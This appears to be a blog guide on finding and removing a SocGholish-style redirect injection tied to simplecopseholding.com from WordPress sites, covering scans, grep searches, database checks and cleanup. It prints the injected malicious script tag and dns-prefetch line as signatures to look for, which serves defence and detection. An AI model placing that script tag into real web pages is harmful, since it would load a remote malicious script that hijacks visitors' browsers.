How to Remove Simplecopseholding.com Redirect Malware (WordPress Fix)

If you are reading this, you are likely panicking because your WordPress site—or your client’s site—is suddenly redirecting users to a spammy domain like simplecopseholding.com or getfix.win.

You might have already scanned the site with a security plugin and found nothing, yet the redirect persists.

This particular malware is part of the SocGholish / FakeUpdate family. It is nasty because it doesn’t just “break” your site; it silently injects code that waits for specific visitors (often from search engines) before hijacking their browser.

Here is exactly what simplecopseholding.com is, how to find it in your code (even when it hides), and how to remove it for good.

What is Simplecopseholding.com?

Simplecopseholding.com is a malicious domain used by hackers to deliver payloads to unsuspecting visitors.

When infected, your website loads a script from this domain. This script acts as a traffic controller:

• It checks the visitor: Is it a real human? Are they on a mobile device?
• It executes the redirect: If the victim matches the criteria, they are forcibly redirected to scam sites selling fake software, crypto schemes, or illegal products.
• It hides: If you (the admin) visit the site, the code often stays dormant, making you think everything is fine.

The Smoking Gun: What the Infection Looks Like

Unlike some hacks that delete files, this malware injects itself into your legitimate files. Based on recent cleanups, here is the signature you need to look for.

Open your website’s source code (Right-click > View Page Source) and search for simplecopseholding. You will likely see a dns-prefetch tag or a script tag looking exactly like this:

<script id="hexagoncontrail-js" src="https://simplecopseholding.com/jWcTAonomVveWlRkcUjN6PF-aopGXJy" type="text/javascript"></script>
<link rel='dns-prefetch' href='//simplecopseholding.com' />

(Above: The malicious “hexagoncontrail” script injecting the redirect.)

If you see dns-prefetch href='//simplecopseholding.com', your site is definitely infected.

How to Find & Remove the Malware (3 Methods)

Because this malware obfuscates (hides) itself inside your database or legitimate plugins, standard scans sometimes miss it. Use these methods in order.

Method 1: The “High Sensitivity” Wordfence Scan

If you already have Wordfence installed, it might have missed the infection because the standard scan is designed to be fast, not deep.

1. Go to Wordfence > All Options.
2. Scroll to General Options and check “Scan core files against repository versions”.
3. Check “Scan theme and plugin files against repository versions”.
4. Set “Scan sensitivity” to High Sensitivity.
5. Run a new scan.

If Wordfence finds a “Modified Core File” or an unknown file in wp-content/plugins, check the code manually before deleting. If you see the domain simplecopseholding inside, delete the file immediately.

Method 2: The Terminal “Grep” Search (For Developers)

If you have SSH access, this is the fastest way to find the hidden code. The malware often hides in header.php, footer.php, or random .js files.

Run this command inside your public_html folder to search for the domain:

grep -r "simplecopseholding" .

If that returns no results, search for the script ID often associated with this campaign:

grep -r "hexagoncontrail" .

• Result: The terminal will show you the exact file path (e.g., ./wp-content/themes/astra/header.php) where the hacker injected the line.
• Fix: Open that file via FTP or File Manager and delete only the malicious line.

Method 3: The “Download & Search” Technique (Failsafe)

If you can’t use SSH and the scanner failed:

1. Connect to your site via FTP (FileZilla).
2. Download your entire wp-content folder to your computer.
3. Open the folder in VS Code (a free code editor).
4. Press Ctrl + Shift + F (Global Search).
5. Search for simplecopseholding.
6. VS Code will scan every single file and show you exactly where the virus is hiding.

 

Checking the Database

Sometimes, the malware isn’t in a file—it’s injected directly into your database options (specifically into the wp_head hook).

1. Install a plugin like “Better Search Replace” (do not run a replace yet!).
2. Run a “Search” for simplecopseholding.
3. If it finds matches in the wp_options table, you will need to edit that row in phpMyAdmin and remove the script tag.

Post-Cleanup Checklist

Once the code is gone, you aren’t safe yet. The hacker likely left a “backdoor” to get back in.

• Change all Admin Passwords: Log everyone out and force a password reset.
• Update Everything: Old plugins are the #1 entry point for this infection.
• Check for “Ghost” Admins: Go to your Users tab. Do you see any admins you don’t recognize? (Look for names like adminbackup or wp-support). Delete them.
• Resubmit to Google: If Google flagged your site as “Dangerous,” go to Search Console and request a review once the clean-up is done.

---

Need Emergency Help?

Removing simplecopseholding.com redirects can be tricky because if you delete the wrong line of code, you can crash your site. If you’ve tried these steps and the redirect is still happening, or if you want a professional to ensure the backdoor is truly closed, I can help.

---

FAQs

Why is my site redirecting only on mobile?

This malware is “smart.” It detects the User-Agent of the visitor. It often ignores desktop users and logged-in admins to stay hidden longer, while aggressively redirecting mobile visitors to maximize scam revenue.

Is simplecopseholding.com a virus?

It is a domain used by a virus (specifically the SocGholish malware family). It serves the malicious JavaScript that hijacks your visitors’ browsers.

Will this hurt my SEO?

Yes. Google will eventually blacklist your site, showing a bright red “Deceptive Site Ahead” warning to users. You must remove the malware immediately to preserve your rankings.